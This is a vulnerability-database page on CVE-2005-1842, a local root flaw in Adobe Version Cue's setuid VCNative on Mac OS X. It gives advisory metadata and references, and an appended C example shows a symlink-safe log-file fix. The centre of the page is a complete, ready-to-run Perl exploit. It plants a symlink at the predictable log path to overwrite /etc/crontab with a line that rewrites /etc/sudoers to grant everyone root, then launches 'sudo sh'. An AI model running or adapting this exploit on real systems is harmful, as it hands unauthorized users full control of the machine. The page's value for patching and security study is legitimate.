Adobe Version Cue for Mac OS X Local Privilege Escalation Vulnerability


Vulnerability ID: 1109040    Vulnerability type: Design error
Published: 2005-08-30    Updated: 2005-10-20
CVE ID: CVE-2005-1842
CNNVD-ID: CNNVD-200508-278
Platform: OSX    CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/1185
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-278
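|Vulnerability details
Adobe Version Cue is a tool bundled with Adobe Creative Suite that provides version management for editing image files. Adobe Version Cue for Mac OS X contains two privilege escalation vulnerabilities. The first (CAN-2005-1842) allows a local attacker to overwrite arbitrary files with superuser privileges through the VCNative application, leading to privilege escalation. The second (CAN-2005-1843) allows a local attacker to load arbitrary libraries with superuser privileges through the VCNative application, which also leads to privilege escalation. A user with a local Mac OS X account can exploit this vulnerability to gain administrator access to local files and applications.
|Exploit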
#!/usr/bin/perl
#
# Adobe Version Cue VCNative[OSX]: local root exploit.
# 
# by: vade79/v9 [email protected] (fakehalo/realhalo)
# 
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formatted as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
#
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
"WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
$vcn_pid=($$ + 1);
$vcn_cwd="/tmp";
$vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid.log";
$ovrfile="/etc/crontab";
$ovrstr="* * * * * root echo \"ALL ALL=(ALL) ALL\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
  pexit("VCNative binary doesn't appear to exist");
}
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
  pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
# record size/mtime before the run so a change can be detected afterwards
@ast=stat($ovrfile);
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
unlink($vcn_tempfile);
@st=stat($ovrfile);
if($st[7]==$ast[7]&&$st[9]==$ast[9]){
  pexit("$ovrfile was not modified, exploit failed");
}
else{
  print("[*] $ovrfile was overwritten successfully...\n");
}
print("[*] waiting for crontab to change /etc/sudoers...\n");
@ast=@st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
  sleep(1);
  @ast=stat("/etc/sudoers");
}
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);

# milw0rm.com [2005-08-30]
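
The header comment above describes the root cause: a setuid-root program writes VCNative-<pid>.log into a caller-chosen directory and follows whatever link already sits at that predictable name. The following C code is an added example of the defensive counterpart, not code from the original page or from Adobe; the function names and the /tmp demo directory are assumptions. It creates the log with O_EXCL and O_NOFOLLOW and checks, in a private temp directory with a constructed victim file, that a pre-planted link is refused.

```c
#define _XOPEN_SOURCE 700 /* POSIX.1-2008: mkdtemp, O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not Adobe's code): create <dir>/<prefix>-<pid>.log
 * without following a pre-planted link. Returns fd, or -1 with errno set. */
int open_log_safely(const char *dir, const char *prefix, char *out, size_t len)
{
    int n = snprintf(out, len, "%s/%s-%ld.log", dir, prefix, (long)getpid());
    if (n < 0 || (size_t)n >= len) { errno = ENAMETOOLONG; return -1; }
    /* O_EXCL fails on any existing name, symlinks included; O_NOFOLLOW
     * refuses a symlink in the final path component. */
    int fd = open(out, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    struct stat st; /* defence in depth: regular file with exactly one link */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Self-check in a private temp dir: place a link at the predicted log name
 * pointing at a constructed "victim" file, then confirm the open is refused
 * and the victim is untouched. Returns 1 when the link is rejected. */
int planted_link_is_rejected(void)
{
    char dir[] = "/tmp/logdemo-XXXXXX", victim[256], log[256], probe[256];
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(log, sizeof log, "%s/demo-%ld.log", dir, (long)getpid());
    int v = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (v < 0 || write(v, "keep", 4) != 4 || close(v) != 0) return -1;
    if (symlink(victim, log) != 0) return -1;
    int fd = open_log_safely(dir, "demo", probe, sizeof probe);
    int refused = (fd < 0);
    if (fd >= 0) close(fd);
    struct stat st;
    int intact = (stat(victim, &st) == 0 && st.st_size == 4);
    unlink(log); unlink(victim); rmdir(dir);
    return refused && intact;
}

int main(void)
{ printf("planted link rejected: %d\n", planted_link_is_rejected()); return 0; }
```

A privileged program should additionally drop its elevated privileges before writing into any directory the caller controls, so that a missed check cannot turn into a root-owned write.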
|References

Source: www.adobe.com
Link: http://www.adobe.com/support/techdocs/327129.html
Source: SECUNIA
Name: 16541
Link: http://secunia.com/advisories/16541
Source: BID
Name: 14638
Link: http://www.securityfocus.com/bid/14638
Source: IDEFENSE
Name: 20050829AdobeVersionCueVCNativeArbitraryFileOverwriteVulnerability
Link: http://www.idefense.com/application/poi/display?id=297&type=vulnerabilities
Source: SECTRACK
Name: 1014776
Link: http://securitytracker.com/id?1014776
